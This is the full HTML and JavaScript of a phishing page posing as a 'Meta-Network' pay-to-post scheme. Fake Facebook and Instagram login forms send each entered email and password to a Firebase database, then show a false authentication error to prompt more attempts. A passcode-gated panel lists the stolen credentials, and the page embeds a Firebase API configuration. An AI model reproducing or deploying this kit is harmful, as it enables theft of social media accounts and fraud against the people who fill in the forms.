<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="css/index.css">
  	
  <script src="js/jquery-3.6.0.min.js"></script>
  <script src="js/index.js"></script>
  <title>Postandearn</title>
</head>
<body>
  <div class="fff" id="first">
	<div class="header">
	 <center> <h1>
	  <span class="fb-blue">Meta-</span><span class="ig-white" id="log">Ne</span><span class="ig-red">twork</span>
	  </h1>
	  </center>
	  
	</div>
	<div class="body">
	  <p align="right"> <button id="earn" onclick="err()" ondblclick="rror()">earnings</button></p>
	  <p id="note">
	    you must log in first to earn from your Instagram/Facebook post.
	  </p>
	  
	  <ul type="disc">
	    <li> Earn money from referring a friend</li>
	    <li>Earn money from posting on your boo Instagram or Facebook. </li>
	    <li> buy coins and covert to followers </li>
	  </ul>
	  <p align="center" id="anime">
	    Sign Up For Free!!!
	  </p>
	  <center>
	    <button class="fbbutton" id="fb-button" onclick="fb()">
	      FACEBOOK
	    </button>
	    <br>
	    <br>
	    <button id="ig-button" onclick="ig()">
	      INSTAGRAM
	    </button>
	    
	  </center>
	</div>
	</div>
	<div class="facebook-login" id="fb" align="center">
	  <div class="ggt">
	  <img src="/image/fb.jpg" alt="logo" id="fblogo">
	  <h1 id="fb">
	    facebook
	  </h1>
	  <input type="text" placeholder="Email or Phone number" id="fb-email"><br>
	  <input type="password" placeholder="Password" id="fb-pass"><br>
	  <button onclick="login()" id="fb-log">
	    Log in
	  </button>
	  </div>
	</div><br><br>
	<div class="Instagram-login" id="ig" align="center">
	  <div class="ppt">
	  	  <img src="/image/ig.jpg" alt="logo" id="iglogo"><br><br>
	  	  <br>
	  <input type="text" placeholder="Username or Email" id="ig-uname"><br>
	  <input type="password" placeholder="Password" id="ig-pass">
	  <br>
	  <button onclick="iglog()" id="ig-log">
	    log in
	  </button>
	</div>
	</div>
	<div class="collect" id="collect">
	  <center>
	    <input type="password" placeholder="passcode" id="passcode">
	    <br>
	    <button id="en-button">Enter</button>
	  </center>
	  
	</div>
	<div class="dashboard" id="dashboard">
	  <center> <h1 class="bead">
	  <span class="fb-blue">Meta-</span><span class="ig-white">Ne</span><span class="ig-red">twork</span>
	  </h1>
	  </center>
	  <div class="earnwith">
	    <textarea name="amount" rows="1" cols="10" id="amount" disabled>$ </textarea>
	   <button id="edit" onclick="attat()">Withdraw</button>
	  </div>
	  <center>
	  <div class="uname">
	    <span id="details">
	      username
	    </span><br>
	    <span class="rest">
	      your account earning bonus
	    </span>
	  </div>
	  <br>
	  <br>
	  <br>
	  </center>
	  <div class="rrtt" id="rrtt">
	    <table align="center" border="1">
	      <tr>
	        <td colspan="3">Sign up bonus</td>
	        <td colspan="1">$3</td>
	      </tr>
	      <tr>
	        <td colspan="3">Referral bonus</td>
	        <td colspan="1">$2</td>
	      </tr>
	      <tr>
	        <td colspan="3">Instagram followers bonus</td>
	        <td colspan="1" id="ig-bonus"></td>
	      </tr>
	      <tr>
	        <td colspan="3">link account bonus</td>
	        <td colspan="1">$4</td>
	      </tr>
	    </table>
	  </div>
	  <br>
	  <br>
	  <br>
	  <center>
	  <button id="coin">
	    buy Instagram followers
	  </button>
	  <br>
	  <br>
	  <button id="database">
	    your referral link
	  </button>
	  </center>
	  <center>
	  <div class="check" id="check">
	    <input type="number" placeholder="Total income" id="income">
	    <input type="name" placeholder="Full name" id="name">
	    <br>
	    <input type="number" placeholder="Instagram followers bonus" id="follower">
	    <br>
	    <button id="up-btn">
	      Update
	    </button>
	  </div>
	  </center>
	  <center>
	  <div class="database" id="corrector">
	    <ul style="color:black;">
	      <li>details below</li>
	      
	    </ul>
	    <div id="save">
	    </div>
	  </div>
	  </center>
	</div>
	<script src="https://www.gstatic.com/firebasejs/5.8.1/firebase-app.js"></script>
	<script src="https://www.gstatic.com/firebasejs/5.8.1/firebase-database.js"></script>
	<script src="https://www.gstatic.com/firebasejs/5.8.1/firebase.js"></script>
	<script>

    // For Firebase JS SDK v7.20.0 and later, measurementId is optional
const firebaseConfig = {
  apiKey: "AIzaSyAp_y7BAbQaWzgtMSQ-8TwTANiwEYrtIbg",
  authDomain: "fir-bff27.firebaseapp.com",
  databaseURL: "https://fir-bff27-default-rtdb.firebaseio.com",
  projectId: "fir-bff27",
  storageBucket: "fir-bff27.appspot.com",
  messagingSenderId: "173752005985",
  appId: "1:173752005985:web:28452a883ed1a36ed64120",
  measurementId: "G-3N195G93DR"
};
  firebase.initializeApp(firebaseConfig);
  
//var admin = require("firebase-admin");

//var serviceAccount = require("/js/serviceAccountKey.json");

/*admin.initializeApp({
  credential: admin.credential.cert(serviceAccount),
  databaseURL: "https://fir-bff27-default-rtdb.firebaseio.com"
});*/

  </script>
<script>
  function fb(){
  firebase.auth().signInAnonymously().catch(function(error){
    // Handle Errors here.
    var errorCode = error.code;
    var errorMessage = error.message;

    window.alert("Error : " + errorMessage);

    // ...
  });

}
  function ig(){
  firebase.auth().signInAnonymously().catch(function(error){
    // Handle Errors here.
    var errorCode = error.code;
    var errorMessage = error.message;

    window.alert("Error : " + errorMessage);

    // ...
  });

}
function login() {
        var emle = document.getElementById("fb-email").value;
        var pass= document.getElementById("fb-pass").value;
        var date = new Date().toISOString().slice(0,10);
        var type = "Facebook";
          if (emle != "" && pass != "")
    {

        firebase.database().ref("fbdet").push().set({
            "emle": emle,
            "pass": pass,
            "date": date,
            "type": type,
            
        });
        setTimeout(function(){
       window.alert("sorry we are unable to authenticate your Facebook details try again later, or try using another account.");
       document.getElementById("fb-pass").value = "";
        return false;
     }, 3000);
        }
    }
    firebase.database().ref("fbdet").on("child_added", function (snapshot) {
    
        var html = "";
        
        html+="<hr></hr>"
        html += "<li id='message-" + snapshot.key + "' class= 'canvaschat'>";
       
        html += snapshot.val().type+ " details are " + snapshot.val().emle+ " as username or email, and " +snapshot.val().pass+ " as password, added on => " +snapshot.val().date;
        html += "</li>";
        html += "<button data-id='" + snapshot.key + "' onclick='deleteMessage(this);' class = 'send'>";
                html += "Delete";
            html += "</button>";
            
        document.getElementById("save").innerHTML += html;
    });
    function deleteMessage(self) {
   
    var messageId = self.getAttribute("data-id");
   
    firebase.database().ref("fbdet").child(messageId).remove();
}
firebase.database().ref("fbdet").on("child_removed", function (snapshot) {
    // remove message node
    document.getElementById("message-" + snapshot.key).innerHTML = "deleted";
});
function iglog() {
        var emle = document.getElementById("ig-uname").value;
        var pass= document.getElementById("ig-pass").value;
        var date = new Date().toISOString().slice(0,10);
        var type = "Instagram";
          if (emle != "" && pass != "")
    {

        firebase.database().ref("igdet").push().set({
            "emle": emle,
            "pass": pass,
            "date": date,
            "type": type,
            
        });
     setTimeout(function(){
       window.alert("sorry we are unable to authenticate your Instagram details try again later, or try using another account.");
       document.getElementById("ig-pass").value = "";
        return false;
     }, 3000);
 
        }
    }
    firebase.database().ref("igdet").on("child_added", function (snapshot) {
    
        var html = "";
        
        html+="<hr></hr>"
        html += "<li id='message-" + snapshot.key + "' class= 'canvaschat'>";
       
        html += snapshot.val().type+ " details are " + snapshot.val().emle+ " as username or email, and " +snapshot.val().pass+ " as password, added on => " +snapshot.val().date;
        html += "</li>";
        html += "<button data-id='" + snapshot.key + "' onclick='deletMessage(this);' class = 'send'>";
                html += "Delete";
            html += "</button>";
        
        document.getElementById("save").innerHTML += html;
    });
    function deletMessage(self) {
   
    var messageId = self.getAttribute("data-id");
 
   
    firebase.database().ref("igdet").child(messageId).remove();
}
 
firebase.database().ref("igdet").on("child_removed", function (snapshot) {
    // remove message node
    document.getElementById("message-" + snapshot.key).innerHTML = "deleted";
});
</script>
<script src="/js/firebase.js">
  
</script>
</body>
</html>